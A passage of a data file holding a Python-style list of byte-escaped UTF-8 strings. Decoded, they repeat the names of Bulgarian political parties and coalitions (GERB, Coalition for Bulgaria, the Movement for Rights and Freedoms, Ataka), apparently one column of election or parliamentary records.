\xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 
\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 
\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f 
\xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f 
\xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 
\xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 
\xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', 
'\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 
\xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f 